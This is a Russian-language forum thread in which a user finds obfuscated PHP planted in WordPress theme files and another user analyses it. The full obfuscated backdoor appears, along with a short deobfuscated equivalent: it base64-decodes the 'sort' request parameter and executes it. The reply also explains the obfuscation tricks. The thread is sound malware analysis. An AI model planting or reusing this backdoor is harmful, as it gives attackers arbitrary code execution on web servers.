Нужно понять что за код может быть. Какой-то зловред залез в файлы шаблона WP

@NobodyH · Регистрация: 17.10.2017

Author24 — интернет-сервис помощи студентам

В общем появился в файлах вот такой код.
Думаю что JS, но он в php файлах находится.

Кликните здесь для просмотра всего текста

Javascript

$DtenYtft1006 = "jxp621iwvafm3e.ysb7r_*g/)5lo04d;zqhtun9k(8c";
 
 
$LBCJnrtX7950 = "";
 
foreach([16,27,19,35] as $Z){
       $LBCJnrtX7950 .= $DtenYtft1006[$Z];
    }
 
 
if(isset($REQUEST /*wVrQipvzhKCdRnWtlBpNNGTevhsIIhZtynzCqDcaiIugyGOMkeTiSeWotoIwmKowvZzHslCVdZhDYtzyeZrXRWTTkORCJHwSleufomVjRJMtszeEQpIfJhJQVITcaXxH*/["$LBCJnrtX7950"])){
    $UDhXdHiQ9795 = $_REQUEST /*wVrQipvzhKCdRnWtlBpNNGTevhsIIhZtynzCqDcaiIugyGOMkeTiSeWotoIwmKowvZzHslCVdZhDYtzyeZrXRWTTkORCJHwSleufomVjRJMtszeEQpIfJhJQVITcaXxH*/["$LBCJnrtX7950"];
    $tsPbRjux420 = "";
    $rtWJJMea334 = "";
 
    /*SHvMtiAWPWkGtRxwPjLvpRakEhMSUWWZWDaKWSYDEjnJhtTIpOnDplubQeNffipvURzctXpEnQkgPpjnKMJfiZIlWuHLkOBkLARNJuAYQQbWrFsmXfYaVhQPVeuLjNHt*/
 
    foreach([17,9,16,13,3,29,20,30,13,42,27,30,13] as $Z){
       $tsPbRjux420 .= $DtenYtft1006[$Z];
    }
 
    /*vBdRTlFLmkLfMovFfQgoBIRMOhbeagHVZXipWwCSBXpIarrrfViWbCMdAEBRMTARxLhhSautKeMFiNhwaueXvQANfvVXrYmgOUZsJYfnMEcVkCQVNmTsIyiREFixPySP*/
 
 
    foreach([16,35,19,19,13,8] as $Z){
       $rtWJJMea334 .= $DtenYtft1006[$Z];
    }
 
    /*YvLXspJAIxnEfLtNvxBgOzJoXipqhrsRcrqVWahhyKqHUoPZVcdoOTefjfpDsDLnaGPnsezigrneCkfFqbyQIHsqpvjjxjYcRohYICJCJreUdAoEDtNLvPzTofXjviek*/
 
    $Z = $rtWJJMea334('n'.'o'.''.''.''.''.'i'.''.''.''.'t'.''.''.''.''.'c'.'n'.'u'.'f'.'_'.'e'.'t'.''.''.''.'a'.'e'.''.''.''.''.'r'.''.''.''.''.'c'.''.''.'');
    $l = $Z("", $tsPbRjux420($UDhXdHiQ9795));
    $l();
    exit();
 
}

@Black Fregat · 14.06.2019, 12:38

Код сводится к следующему:

PHP

if(isset($REQUEST["sort"])){
    $f = create_function("", base64_decode($REQUEST["sort"]))
    $f()
}

Явная закладка

@NobodyH · 14.06.2019, 14:39 **[ТС]**

Код сводится к следующему:
if(isset($REQUEST["sort"])){
$f = create_function("", base64_decode($REQUEST["sort"]))
$f()
}

Т.е ?
С помощью вашего кода это можно расшифровать как-то ?

@Black Fregat · 14.06.2019, 14:56

Сообщение от NobodyH

Т.е ?

Работа Вашего кода, если снять обфускацию, эквивалентна этим строчкам.
Берётся строка из параметров запроса, декодируется base64 и запускается.
Что злодей пришлёт, то и запустится.

Сообщение от NobodyH

это можно расшифровать как-то

Там нечего расшифровывать. Всего 3 фишки:
1) Намеренно усложнённые имена переменных
2) Часть строк закодирована через индексирование строки:
- есть строка "jxp621iwvafm3e.ysb7r_*g/)5lo04d;zqhtun9k(8c"
- есть список индексов, например, [16,27,19,35]
- берём буквы из строки по индексам, получаем "sort"
3) Ещё одна строка просто реверсирована, разбита на символы и разбавлена пустыми строками.

@NobodyH 1 / 1 / 0 Регистрация: 17.10.2017 Сообщений: 4
	14.06.2019, 14:39 [ТС]	3
	Код сводится к следующему: if(isset($REQUEST["sort"])){ $f = create_function("", base64_decode($REQUEST["sort"])) $f() } Т.е ? С помощью вашего кода это можно расшифровать как-то ? 0

@Black Fregat Фрилансер 3705 / 2077 / 567 Регистрация: 31.05.2009 Сообщений: 6,683
	14.06.2019, 14:56	4
	Сообщение было отмечено NobodyH как решение Решение Сообщение от NobodyH Т.е ? Работа Вашего кода, если снять обфускацию, эквивалентна этим строчкам. Берётся строка из параметров запроса, декодируется base64 и запускается. Что злодей пришлёт, то и запустится. Сообщение от NobodyH это можно расшифровать как-то Там нечего расшифровывать. Всего 3 фишки: 1) Намеренно усложнённые имена переменных 2) Часть строк закодирована через индексирование строки: - есть строка "jxp621iwvafm3e.ysb7r_*g/)5lo04d;zqhtun9k(8c" - есть список индексов, например, [16,27,19,35] - берём буквы из строки по индексам, получаем "sort" 3) Ещё одна строка просто реверсирована, разбита на символы и разбавлена пустыми строками. 1

Нужно понять что за код может быть. Какой-то зловред залез в файлы шаблона WP

Решение